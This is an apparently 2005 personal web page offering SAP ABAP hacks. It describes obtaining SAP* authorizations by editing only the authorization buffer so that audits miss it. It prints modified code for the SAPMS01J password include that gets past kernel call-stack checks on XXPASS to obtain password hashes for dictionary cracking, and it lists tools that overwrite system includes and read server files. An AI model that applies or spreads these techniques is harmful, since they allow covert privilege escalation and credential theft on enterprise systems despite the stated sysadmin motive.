My ABAP
code is under the GPL license. Click here to get a copy.
There are several programs
in the internet to get SAP* authorizations.
Here you find my own version.
The nice thing is that it does not change the user profile, but only the user
buffer for authorization. So it is invisible to most programs checking users
for critical authorizations.
There are cute
program on the internet that implement a kind of dictionary password checking.
This was
fine until something changed in the SAP kernel. Now the calls to check_pass are
somehow checked, with the result that if they are called from a Z or Y program
the user is locked and kicked out of the system, all other reports are
tentatively fooled with strange data i don’t understand.. This is a bit hard a
treatement for a poor sysadmin trying to get his users to choose reasonable
passwords.
One
argument could be that there is a very nice system to specify patterns for
forbidden passwords in some table somehwere, so that users cannot choose these
password. So there is no need to call the password hashing code directly. And
this is true, but it is far less powerful than the good old Unix crack.
So one
could want to do it anyway. And here is a “simple” way to do it.
Just copy
the coding in check_pass to another form and call this form “externally” from
the form set_new_pass or check_pass. And voila’ it works and you can get all
password hashes that you want. It seems that the xxpass code looks at the call
stack… changing the call stack seems to be the trick. Here is an example:
*---------------------------------------------------------------------*
* FORM
SET_NEW_PASS *
*---------------------------------------------------------------------*
* Passwort neu setzen.
*
*
*
*---------------------------------------------------------------------*
FORM SET_NEW_PASS USING USER NEWCODE NEWCODE1 RC.
perform do_it
in program SAPMS01J USING USER NEWCODE NEWCODE1 RC.
ENDFORM.
form do_it USING USER NEWCODE NEWCODE1 RC.
SELECT SINGLE
* FROM USR02
WHERE
BNAME = USER.
IF SY-SUBRC
<> 0.
RC = 274.
* message e274
with user.
ENDIF.
SY-SUBRC = 0.
MOVE-CORRESPONDING USR02 TO *USR02.
" note 154401/2
PERFORM
SHIFT_OLD_PASS.
CALL 'XXPASS'
ID 'CODE' FIELD NEWCODE
ID
'CODX' FIELD USR02-BCODE
ID
'NAME' FIELD USR02-BNAME
ID
'VERS' FIELD USR02-CODVN
ID
'PASSCODE' FIELD USR02-PASSCODE. "new as of 6.20
CLEAR
USR02-LTIME.
UPDATE USR02.
IF SY-SUBRC
<> 0.
RC = 297.
* message
s297.
ELSE.
PERFORM
WRITE_USH02.
ENDIF.
RC = 0.
* message s277 with user.
endform.
The same works with check_pass in the same include. An easy way to get
the modified version of MS01JF10 into your system could be using the include uploader
Here is the whole include:
Change table
T000 in direct input
Get a
file from the application servers file system
Put a
file onto the application servers file system
Upload include: overwrites the include
Copyright © 2005 Krapinskij
Verbatim copying and distribution of this entire article are permitted
worldwide, without royalty, in any medium, provided this notice, and the
copyright notice, are preserved.
Last update 28/10/2005
14:58